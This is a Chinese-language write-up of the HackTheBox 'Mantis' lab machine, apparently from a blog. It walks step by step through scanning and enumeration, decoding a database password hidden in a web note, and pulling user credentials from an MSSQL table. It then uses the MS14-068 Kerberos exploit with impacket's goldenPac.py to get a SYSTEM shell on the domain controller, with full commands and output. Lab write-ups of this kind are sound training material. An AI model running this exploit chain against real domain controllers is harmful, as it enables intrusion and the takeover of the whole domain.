一個滲透實例

需要很大的耐心和大量的枚舉，過程也很酷，因為我以前從來沒有做過類似的事情。最後很高興在HackTheBox中看到一個域控制器。

root@kali:~/htb/mantis# nmap -A 10.10.10.52

Starting Nmap 7.50 ( https://nmap.org )

Nmap scan report for 10.10.10.52

Host is up (0.11s latency).

Not shown: 981 closed ports

PORT STATE SERVICE VERSION

53/tcp open domain Microsoft DNS 6.1.7601

dns-nsid:

_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)

88/tcp open tcpwrapped

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)

445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)

464/tcp open kpasswd5?

593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0

636/tcp open tcpwrapped

1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM

ms-sql-ntlm-info:

Target_Name: HTB

NetBIOS_Domain_Name: HTB

NetBIOS_Computer_Name: MANTIS

DNS_Domain_Name: htb.local

DNS_Computer_Name: mantis.htb.local

_ Product_Version: 6.1.7601

ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback

Not valid before: 2018-02-09T14:23:56

_Not valid after: 2048-02-09T14:23:56

_ssl-date: 2018-02-09T14:30:53+00:00; 0s from scanner time.

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)

3269/tcp open tcpwrapped

8080/tcp open http Microsoft IIS httpd 7.5

_http-server-header: Microsoft-IIS/7.5

_http-title: Tossed Salad - Blog

49152/tcp open msrpc Microsoft Windows RPC

49153/tcp open msrpc Microsoft Windows RPC

49154/tcp open msrpc Microsoft Windows RPC

49155/tcp open msrpc Microsoft Windows RPC

49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0

49158/tcp open msrpc Microsoft Windows RPC

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.50%E=4%D=2/9%OT=53%CT=1%CU=35559%PV=Y%DS=2%DC=T%G=Y%TM=5A7DB115

OS:%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%CI=I%TS=7)SEQ(SP=101%GCD=1

OS:%ISR=107%TS=7)SEQ(SP=103%GCD=1%ISR=108%TI=RD%CI=I%TS=8)OPS(O1=M54DNW8ST1

OS:1%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST

OS:11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80

OS:%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R

OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=

OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=

OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0

OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1

OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops

Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

ms-sql-info:

10.10.10.52:1433:

Version:

name: Microsoft SQL Server 2014 RTM

number: 12.00.2000.00

Product: Microsoft SQL Server 2014

Service pack level: RTM

Post-SP patches applied: false

_ TCP port: 1433

smb-os-discovery:

OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)

OS CPE: cpe:/o:microsoft:windows_server_2008::sp1

Computer name: mantis

NetBIOS computer name: MANTISx00

Domain name: htb.local

Forest name: htb.local

FQDN: mantis.htb.local

_ System time: 2018-02-09T09:30:52-05:00

smb-security-mode:

account_used:

authentication_level: user

challenge_response: supported

_ message_signing: required

_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE (using port 111/tcp)

HOP RTT ADDRESS

1 52.42 ms 10.10.14.1

2 252.79 ms 10.10.10.52

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 264.56 seconds

好的，我們這裡可以看到有相當多內容，LDAP服務開放埠準確的說是一個域控制器，運行著IIS服務，開放了8080埠。

這裡只有一個登陸點，但是並沒有用戶名，gobuster還未得到結果，我們可以嘗試列舉kerberos的用戶名，或許能得到一些信息。

root@kali:~/htb/mantis# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="htb.local",userdb=/usr/share/seclists/Usernames/Names/names.txt 10.10.10.52

Starting Nmap 7.50 (https://nmap.org)

Nmap scan report for 10.10.10.52

Host is up (0.068s latency).

PORT STATE SERVICE

88/tcp open kerberos-sec

krb5-enum-users:

Discovered Kerberos principals

_James@htb.local

並沒有得到希望的結果，我們用nmap來進行一個完整的埠掃描看看是否存在其他突破點。

root@kali:~/htb/mantis# nmap -p- 10.10.10.52 -T4

Starting Nmap 7.50 ( https://nmap.org )

Initiating Ping Scan at 10:05

Scanning 10.10.10.52 [4 ports]

Completed Ping Scan at 10:05, 0.42s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 10:05

Completed Parallel DNS resolution of 1 host. at 10:05, 6.18s elapsed

Initiating SYN Stealth Scan at 10:05

Scanning 10.10.10.52 [65535 ports]

PORT STATE SERVICE

53/tcp open domain

88/tcp open kerberos-sec

135/tcp open msrpc

139/tcp open netbios-ssn

389/tcp open ldap

445/tcp open microsoft-ds

464/tcp open kpasswd5

593/tcp open http-rpc-epmap

636/tcp open ldapssl

1337/tcp open waste

1433/tcp open ms-sql-s

3268/tcp open globalcatLDAP

3269/tcp open globalcatLDAPssl

5722/tcp open msdfsr

8080/tcp open http-proxy

9389/tcp open adws

47001/tcp open winrm

49152/tcp open unknown

49153/tcp open unknown

49154/tcp open unknown

49155/tcp open unknown

49157/tcp open unknown

49158/tcp open unknown

49164/tcp open unknown

49166/tcp open unknown

49168/tcp open unknown

50255/tcp open unknown

掃描完畢,我們看到埠 1337是開著的。是一個默認的IIS頁面

來看看gobuster新發現的埠

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -uhttp://10.10.10.52:1337

Gobuster v1.2 OJ Reeves (@TheColonial)

=====================================================

[ ] Mode : dir

[ ] Url/Domain :http://10.10.10.52:1337/

[ ] Threads : 10

[ ] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

[ ] Status codes : 200,204,301,302,307

=====================================================

/secure_notes (Status: 301)

web.config文件拋出一個404。dev標題看起來有一些像base64。用戶名admin,以及一個資料庫名稱orcharddb.

讓我們試著base64解碼文件名。

root@kali:~/htb/mantis# base64 -d

6d2424716c5f53405f504073735730726421

這種不匹配任何散列長度，但它確實看起來像十六進位。

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 xxd -r -p

m$$ql_S@_P@ssW0rd!

讓我們開始吧。最後一些工作的憑據。如果我們嘗試連接到使用SQSH與SA用戶及密碼會被拒絕訪問MSSQL。但是，使用admin用戶的密碼或許能進去。

root@kali:~/htb/mantis# sqsh -S 10.10.10.52 -U admin

sqsh-2.1.7 Copyright (C) 1995-2001 Scott C. Gray

Portions Copyright (C) 2004-2010 Michael Peppler

This is free software with ABSOLUTELY NO WARRANTY

For more information type "warranty"

Password:

1>

讓我們列舉裡面的表名 orcharddb.

註：我已經清理了下面的格式，SQSH有可怕的輸出格式。如果需要，可以輸出到CSV文件中並查看其他文件" go - m csv > /root/htb/mantis/table.csv "

1> SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = "BASE TABLE";

2> go

TABLE_NAME

-------------------------------------------------------------------------------

blog_Orchard_Blogs_RecentBlogPostsPartRecord

blog_Orchard_Blogs_BlogArchivesPartRecord

blog_Orchard_Workflows_TransitionRecord

blog_Orchard_Workflows_WorkflowRecord

blog_Orchard_Workflows_WorkflowDefinitionRecord

blog_Orchard_Workflows_AwaitingActivityRecord

blog_Orchard_Workflows_ActivityRecord

blog_Orchard_Tags_TagsPartRecord

blog_Orchard_Framework_DataMigrationRecord

blog_Orchard_Tags_TagRecord

blog_Orchard_Tags_ContentTagRecord

blog_Settings_ContentFieldDefinitionRecord

blog_Orchard_Framework_DistributedLockRecord

blog_Settings_ContentPartDefinitionRecord

blog_Settings_ContentPartFieldDefinitionRecord

blog_Settings_ContentTypeDefinitionRecord

blog_Settings_ContentTypePartDefinitionRecord

blog_Settings_ShellDescriptorRecord

blog_Settings_ShellFeatureRecord

blog_Settings_ShellFeatureStateRecord

blog_Settings_ShellParameterRecord

blog_Settings_ShellStateRecord

blog_Orchard_Framework_ContentItemRecord

blog_Orchard_Framework_ContentItemVersionRecord

blog_Orchard_Framework_ContentTypeRecord

blog_Orchard_Framework_CultureRecord

blog_Common_BodyPartRecord

blog_Common_CommonPartRecord

blog_Common_CommonPartVersionRecord

blog_Common_IdentityPartRecord

blog_Containers_ContainerPartRecord

blog_Containers_ContainerWidgetPartRecord

blog_Containers_ContainablePartRecord

blog_Title_TitlePartRecord

blog_Navigation_MenuPartRecord

blog_Navigation_AdminMenuPartRecord

blog_Scheduling_ScheduledTaskRecord

blog_Orchard_ContentPicker_ContentMenuItemPartRecord

blog_Orchard_Alias_AliasRecord

blog_Orchard_Alias_ActionRecord

blog_Orchard_Autoroute_AutoroutePartRecord

blog_Orchard_Users_UserPartRecord

blog_Orchard_Roles_PermissionRecord

blog_Orchard_Roles_RoleRecord

blog_Orchard_Roles_RolesPermissionsRecord

blog_Orchard_Roles_UserRolesPartRecord

blog_Orchard_Packaging_PackagingSource

blog_Orchard_Recipes_RecipeStepResultRecord

blog_Orchard_OutputCache_CacheParameterRecord

blog_Orchard_MediaProcessing_ImageProfilePartRecord

blog_Orchard_MediaProcessing_FilterRecord

blog_Orchard_MediaProcessing_FileNameRecord

blog_Orchard_Widgets_LayerPartRecord

blog_Orchard_Widgets_WidgetPartRecord

blog_Orchard_Comments_CommentPartRecord

blog_Orchard_Comments_CommentsPartRecord

blog_Orchard_Taxonomies_TaxonomyPartRecord

blog_Orchard_Taxonomies_TermPartRecord

blog_Orchard_Taxonomies_TermContentItem

blog_Orchard_Taxonomies_TermsPartRecord

blog_Orchard_MediaLibrary_MediaPartRecord

blog_Orchard_Blogs_BlogPartArchiveRecord(62 rows affected)

blog_Orchard_Users_UserPartRecord表看起來像我們所需要的。

1> USE orcharddb;

2> go

1> SELECT * FROM blog_Orchard_Users_UserPartRecord;

2> go

Id

UserName

Email

NormalizedUserName

Password

PasswordFormat

HashAlgorithm

PasswordSalt

RegistrationStatus

EmailStatus

EmailChallengeToken

CreatedUtc LastLoginUtc LastLogoutUtc

-------------------------------------------------------------------------------

2

admin

admin

AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK lgKY6vrQuswfWHKZn2 A==

Hashed

PBKDF2

UBwWF1CQCsaGc/P7jIR/kg==

Approved

Approved

NULL

Sep 1 2017 01:44PM Sep 1 2017 02:03PM Sep 1 2017 02:06PM

15

James

james@htb.local

james

J@m3s_P@ssW0rd!

Plaintext

Plaintext

NA

Approved

Approved

NULL

Sep 1 2017 01:45PM NULL NULL

(2 rows affected)

得到密碼。讓我們通過SMB測試這些憑證，看看它們是否是有效的Windows憑據。

root@kali:~/htb/mantis# smbclient -L 10.10.10.52/ -U james

WARNING: The "syslog" option is deprecated

Enter WORKGROUPjames"s password:

Domain=[HTB] OS=[] Server=[]

Sharename Type Comment

--------- ---- -------

ADMIN$ Disk Remote Admin

C$ Disk Default share

IPC$ IPC Remote IPC

NETLOGON Disk Logon server share

SYSVOL Disk Logon server share

實際上它們是有效的。我們可以成功地在機器上列出內容。我們可以看到兩個組策略對象，但沒什麼大用處。

Exploitation

我們的憑據不給我們通過winexe shell，所以我們必須找出另一種方式。既然我們知道這是一個域控制器，也許我們可以利用Kerberos來幫助我們得到想要的東西。

詳細解釋如何攻擊的工作報告:http://adsecurity.org/?p=541

安裝最新版本的impacket，指定依賴關係後。編輯並添加域控制器。

現在我們配置 /etc/krb5.conf

讓我們與DC同步。

rdate -n 10.10.10.52

所以現在準備開始我們的開發過程。首先生成我們的impacket工具。

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# kinit james

Password forjames@HTB.LOCAL:

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# klist

Ticket cache: FILE:/tmp/krb5cc_0

Default principal:james@HTB.LOCAL

Valid starting Expires Service principal

02/09/2018 15:29:07 02/10/2018 01:29:07 krbtgt/HTB.LOCAL@HTB.LOCAL

renew until 02/10/2018 15:28:37

接下來我們需要得到james的SID。

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# rpcclient -U james mantis

Enter WORKGROUPjames"s password:

rpcclient $> lookupnames james

james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

現在我們可以運行ms14 - 068 python開發腳本。

root@kali:~/htb/mantis/pykek-master# python ms14-068.py -ujames@HTB.LOCAL-sS-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis

Password:

[ ] Building AS-REQ for mantis... Done!

[ ] Sending AS-REQ to mantis... Done!

[ ] Receiving AS-REP from mantis... Done!

[ ] Parsing AS-REP from mantis... Done!

[ ] Building TGS-REQ for mantis... Done!

[ ] Sending TGS-REQ to mantis... Done!

[ ] Receiving TGS-REP from mantis... Done!

[ ] Parsing TGS-REP from mantis... Done!

[ ] Creating ccache file "TGT_james@HTB.LOCAL.ccache"... Done!

默認情況下，任何用戶的授權票證的票證（TGT）用於客戶端是從默認的Kerberos憑據緩存讀取，它位於/tmp/krb5cc_uid。所以現在我們有了緩存文件，我們需要把它複製到適當的位置。

一切就緒，我們可以使用impacket的goldenpac.py工具獲得我們的shell

root@kali:~/htb/mantis/impacket-master/impacket-master/examples# ./goldenPac.py HTB.LOCAL/james@mantis

Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies

Password: User SID: S-1-5-21-4220043660-4019079961-2895681657-1103 Forest SID: S-1-5-21-4220043660-4019079961-2895681657 Attacking domain controller mantis.htb.local mantis.htb.local found vulnerable! Requesting shares on mantis..... Found writable share ADMIN$ Uploading file cugfXzCt.exe Opening SVCManager on mantis..... Creating service QcYY on mantis..... Starting service QcYY.....

[!] Press help for extra shell commands

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:Windowssystem32>whoami & hostname

nt authoritysystem

mantis

已經成功獲取了system shell

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！